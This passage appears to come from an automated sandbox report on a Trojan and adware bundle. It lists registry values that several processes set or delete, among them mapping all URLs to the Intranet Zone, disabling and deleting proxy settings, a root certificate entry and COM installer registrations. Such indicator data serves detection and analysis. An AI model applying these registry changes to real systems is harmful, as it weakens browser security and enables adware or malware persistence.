[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\ActSys]
"instid" = "FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"E9C15E05782C5BADC4287A994D1DDEDB171B8B2A"
The process ActSys.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 BC 36 45 A7 A1 90 29 04 1B E2 92 15 F3 1E 25"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 4B 0A E5 61 BA 54 65 0D 62 D2 C3 BD 6C 11 39"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: HTk3wxj1YXaXLjmPTfdUb6)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"DisplayVersion" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"QuietUninstallString" = "%Program Files%\WNet\uninst.exe"
"UninstallString" = "%Program Files%\WNet\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cmdshell.exe:3548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F CE A6 C2 99 E6 A4 9B 41 99 37 6E 2F D6 4A 3B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process amisetup5755__9664.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCR\espial.deiform]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}]
"(Default)" = "IBoot"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\TypeLib]
"(Default)" = "{89c1a748-b869-4016-8319-4d690ad9fb4a}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\VersionIndependentProgID]
"(Default)" = "espial.deiform"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\espial.deiform.1\CLSID]
"(Default)" = "{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
"(Default)" = "{89C1A748-B869-4016-8319-4D690AD9FB4A}"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\espial.deiform.1]
"(Default)" = "Inst Class"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0]
"(Default)" = "InstallerLib"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1429772524"
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}]
"(Default)" = "Inst Class"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 CA 87 11 14 2E 2D 07 1C 5A 41 3E 05 2D 8C 64"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup5755__9664.exe"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup5755__9664\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\ProgID]
"(Default)" = "espial.deiform.1"
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\espial.deiform\CurVer]
"(Default)" = "espial.deiform.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\VersionIndependentProgID]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid32]
[HKCR\espial.deiform.1]
[HKCR\espial.deiform\CurVer]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0\win32]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\FLAGS]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\HELPDIR]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid]
[HKCR\espial.deiform.1\CLSID]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Programmable]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}]
[HKCR\espial.deiform]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\ProgID]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Version]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\TypeLib]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"ServerExecutable"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup5755__9664\DEBUG]
"Trace Level"
The process nfregdrv.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 2D A1 B6 B6 CA 07 B2 99 CE D4 A8 0D 24 2A C5"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process nfregdrv.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC B8 71 18 71 E6 BE 5D 5D 3B 37 A7 5B 5E C1 72"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
The process %original file name%.exe:1396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 9A DA 6E 4F 35 B6 2A A8 D8 19 6A D6 1E 73 9B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp]
"QQBrowser.exe" = "QQ浏览器"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 D8 12 C4 55 2B 78 AC 9B 09 50 FE EC 40 EE 4A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process CashReminder.exe:1232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
